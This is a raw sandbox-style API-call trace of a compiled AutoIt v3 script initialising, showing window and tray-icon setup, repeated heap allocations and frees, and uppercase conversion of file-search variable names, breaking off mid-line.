[0276.864] RegisterClassExW (param_1=0x75fba0) returned 0xc120 [0276.864] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0c2 [0276.864] InitCommonControlsEx (picce=0x75fbd0) returned 1 [0276.864] ImageList_Create (cx=16, cy=16, flags=0x21, cInitial=1, cGrow=1) returned 0x88cbd0 [0276.865] LoadIconW (hInstance=0x290000, lpIconName=0xa9) returned 0x1d010b [0276.865] ImageList_ReplaceIcon (himl=0x88cbd0, i=-1, hicon=0x1d010b) returned 0 [0276.866] CreateWindowExW (dwExStyle=0x0, lpClassName="AutoIt v3", lpWindowName="AutoIt v3", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=100, hWndParent=0x0, hMenu=0x0, hInstance=0x290000, lpParam=0x0) returned 0xa0160 [0276.866] NtdllDefWindowProc_W () returned 0x0 [0276.866] NtdllDefWindowProc_W () returned 0x1 [0276.868] NtdllDefWindowProc_W () returned 0x0 [0276.871] SetTimer (hWnd=0xa0160, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0276.871] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0c2 [0276.871] CreatePopupMenu () returned 0x11017f [0276.871] CreateWindowExW (dwExStyle=0x0, lpClassName="edit", lpWindowName=0x0, dwStyle=0x50b008c4, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xa0160, hMenu=0x1, hInstance=0x290000, lpParam=0x0) returned 0xb016e [0276.881] NtdllDefWindowProc_W () returned 0x0 [0276.881] ShowWindow (hWnd=0xa0160, nCmdShow=0) returned 0 [0276.881] ShowWindow (hWnd=0xa0160, nCmdShow=0) returned 0 [0276.881] Shell_NotifyIconW (dwMessage=0x0, lpData=0x75f878) returned 1 [0276.903] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20a) returned 0x88d660 [0276.903] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965cf0 [0276.903] Shell_NotifyIconW (dwMessage=0x1, lpData=0x75f4a8) returned 1 [0276.904] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x88d660 | out: hHeap=0x850000) returned 1 [0276.904] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965cf0 | out: hHeap=0x850000) returned 1 [0276.904] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.904] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.904] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965cf0 [0276.904] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959c70 [0276.904] CharUpperBuffW (in: lpsz="_FO_FILESEARCH", cchLength=0xe | out: lpsz="_FO_FILESEARCH") returned 0xe [0276.904] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x959c70 | out: hHeap=0x850000) returned 1 [0276.904] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965cf0 | out: hHeap=0x850000) returned 1 [0276.904] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.904] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965cf0 [0276.904] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x96ee10 [0276.904] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0276.904] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96ee10 | out: hHeap=0x850000) returned 1 [0276.904] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965cf0 | out: hHeap=0x850000) returned 1 [0276.904] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.904] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965cf0 [0276.904] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x96ee10 [0276.904] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0276.904] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96ee10 | out: hHeap=0x850000) returned 1 [0276.904] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965cf0 | out: hHeap=0x850000) returned 1 [0276.904] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.904] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965cf0 [0276.904] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x96ee10 [0276.904] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCH", cchLength=0x11 | out: lpsz="__FO_FOLDERSEARCH") returned 0x11 [0276.904] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96ee10 | out: hHeap=0x850000) returned 1 [0276.904] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965cf0 | out: hHeap=0x850000) returned 1 [0276.904] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.904] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965cf0 [0276.904] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x96ee10 [0276.904] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0276.904] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96ee10 | out: hHeap=0x850000) returned 1 [0276.904] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965cf0 | out: hHeap=0x850000) returned 1 [0276.904] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.904] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965cf0 [0276.905] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x96ee10 [0276.905] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0276.905] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96ee10 | out: hHeap=0x850000) returned 1 [0276.905] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965cf0 | out: hHeap=0x850000) returned 1 [0276.905] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.905] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965cf0 [0276.905] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x96ee10 [0276.905] CharUpperBuffW (in: lpsz="__FO_GETLISTMASK", cchLength=0x10 | out: lpsz="__FO_GETLISTMASK") returned 0x10 [0276.905] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96ee10 | out: hHeap=0x850000) returned 1 [0276.905] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965cf0 | out: hHeap=0x850000) returned 1 [0276.905] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.905] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965cf0 [0276.905] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x96ee10 [0276.905] CharUpperBuffW (in: lpsz="__FO_FILESEARCHTYPE", cchLength=0x13 | out: lpsz="__FO_FILESEARCHTYPE") returned 0x13 [0276.905] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96ee10 | out: hHeap=0x850000) returned 1 [0276.905] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965cf0 | out: hHeap=0x850000) returned 1 [0276.905] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.905] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965cf0 [0276.905] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x96ee10 [0276.905] CharUpperBuffW (in: lpsz="__FO_FILESEARCHMASK", cchLength=0x13 | out: lpsz="__FO_FILESEARCHMASK") returned 0x13 [0276.905] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96ee10 | out: hHeap=0x850000) returned 1 [0276.905] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965cf0 | out: hHeap=0x850000) returned 1 [0276.905] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.905] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965cf0 [0276.905] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959c70 [0276.905] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0276.905] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x959c70 | out: hHeap=0x850000) returned 1 [0276.905] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965cf0 | out: hHeap=0x850000) returned 1 [0276.905] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.905] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969388 [0276.905] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969340 [0276.905] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965cf0 [0276.905] RtlSizeHeap (HeapHandle=0x850000, Flags=0x0, MemoryPointer=0x873138) returned 0x80 [0276.906] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959c70 [0276.906] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969310 [0276.906] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965d00 [0276.906] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969310 | out: hHeap=0x850000) returned 1 [0276.906] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959c98 [0276.906] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969310 [0276.906] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969250 [0276.906] RtlSizeHeap (HeapHandle=0x850000, Flags=0x0, MemoryPointer=0x873138) returned 0x80 [0276.906] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965d10 [0276.906] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969250 | out: hHeap=0x850000) returned 1 [0276.906] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965d10 | out: hHeap=0x850000) returned 1 [0276.906] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.906] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959cc0 [0276.906] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969250 [0276.906] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965d10 [0276.906] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969250 | out: hHeap=0x850000) returned 1 [0276.906] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959ce8 [0276.906] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969250 [0276.906] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969238 [0276.906] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965d20 [0276.906] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969238 | out: hHeap=0x850000) returned 1 [0276.906] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965d20 | out: hHeap=0x850000) returned 1 [0276.906] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.906] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959d10 [0276.906] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969238 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965d20 [0276.907] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969238 | out: hHeap=0x850000) returned 1 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959d38 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969238 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9693b8 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965d30 [0276.907] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9693b8 | out: hHeap=0x850000) returned 1 [0276.907] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965d30 | out: hHeap=0x850000) returned 1 [0276.907] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959d60 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9693b8 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965d30 [0276.907] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9693b8 | out: hHeap=0x850000) returned 1 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959d88 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9693b8 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9693d0 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965d40 [0276.907] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9693d0 | out: hHeap=0x850000) returned 1 [0276.907] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965d40 | out: hHeap=0x850000) returned 1 [0276.907] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959db0 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9693d0 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965d40 [0276.907] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9693d0 | out: hHeap=0x850000) returned 1 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x96ee10 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9693d0 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9693e8 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965d50 [0276.907] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9693e8 | out: hHeap=0x850000) returned 1 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9693e8 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965d60 [0276.907] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9693e8 | out: hHeap=0x850000) returned 1 [0276.907] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965d60 | out: hHeap=0x850000) returned 1 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959dd8 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9693e8 [0276.907] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965d60 [0276.908] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965d60 | out: hHeap=0x850000) returned 1 [0276.908] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969400 [0276.908] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965d60 [0276.908] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965d60 | out: hHeap=0x850000) returned 1 [0276.908] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9693e8 | out: hHeap=0x850000) returned 1 [0276.908] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969400 | out: hHeap=0x850000) returned 1 [0276.908] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x959dd8 | out: hHeap=0x850000) returned 1 [0276.908] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965d50 | out: hHeap=0x850000) returned 1 [0276.908] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.908] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959dd8 [0276.908] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969400 [0276.908] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965d50 [0276.908] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969400 | out: hHeap=0x850000) returned 1 [0276.908] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959e00 [0276.908] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969400 [0276.908] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9693e8 [0276.908] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965d60 [0276.908] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9693e8 | out: hHeap=0x850000) returned 1 [0276.908] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965d60 | out: hHeap=0x850000) returned 1 [0276.908] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.908] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959e28 [0276.908] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9693e8 [0276.908] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965d60 [0276.908] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x9693e8 | out: hHeap=0x850000) returned 1 [0276.908] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x96ed68 [0276.908] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x9693e8 [0276.908] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969418 [0276.908] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965d70 [0276.908] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969418 | out: hHeap=0x850000) returned 1 [0276.908] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965d70 | out: hHeap=0x850000) returned 1 [0276.908] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.908] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959e50 [0276.908] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969418 [0276.908] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965d70 [0276.908] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969418 | out: hHeap=0x850000) returned 1 [0276.908] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x96ee48 [0276.922] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969418 [0276.923] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969430 [0276.923] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965d80 [0276.923] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969430 | out: hHeap=0x850000) returned 1 [0276.923] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965d80 | out: hHeap=0x850000) returned 1 [0276.923] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.923] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959e78 [0276.923] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969430 [0276.923] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965d80 [0276.923] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969430 | out: hHeap=0x850000) returned 1 [0276.923] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0x96ee80 [0276.923] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969430 [0276.923] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969448 [0276.923] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965d90 [0276.923] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969448 | out: hHeap=0x850000) returned 1 [0276.923] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959ea0 [0276.923] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969448 [0276.923] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965da0 [0276.923] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965da0 | out: hHeap=0x850000) returned 1 [0276.923] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969460 [0276.923] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965da0 [0276.923] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965da0 | out: hHeap=0x850000) returned 1 [0276.923] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969448 | out: hHeap=0x850000) returned 1 [0276.923] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969460 | out: hHeap=0x850000) returned 1 [0276.923] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x959ea0 | out: hHeap=0x850000) returned 1 [0276.923] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965d90 | out: hHeap=0x850000) returned 1 [0276.923] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.923] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959ea0 [0276.923] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969460 [0276.924] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965d90 [0276.924] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969460 | out: hHeap=0x850000) returned 1 [0276.924] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959ec8 [0276.924] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969460 [0276.924] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969448 [0276.924] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965da0 [0276.924] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969448 | out: hHeap=0x850000) returned 1 [0276.924] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959ef0 [0276.924] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969448 [0276.924] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965db0 [0276.924] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965db0 | out: hHeap=0x850000) returned 1 [0276.924] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969478 [0276.924] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965db0 [0276.924] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965db0 | out: hHeap=0x850000) returned 1 [0276.924] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969490 [0276.924] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965db0 [0276.924] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965db0 | out: hHeap=0x850000) returned 1 [0276.924] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969448 | out: hHeap=0x850000) returned 1 [0276.924] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969478 | out: hHeap=0x850000) returned 1 [0276.924] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969490 | out: hHeap=0x850000) returned 1 [0276.924] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x959ef0 | out: hHeap=0x850000) returned 1 [0276.924] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x965da0 | out: hHeap=0x850000) returned 1 [0276.924] PeekMessageW (in: lpMsg=0x75fb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75fb54) returned 0 [0276.924] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959ef0 [0276.924] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969490 [0276.924] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x965da0 [0276.924] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969490 | out: hHeap=0x850000) returned 1 [0276.924] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x959f18 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969490 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969478 [0276.925] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x965db0 [0276.925] 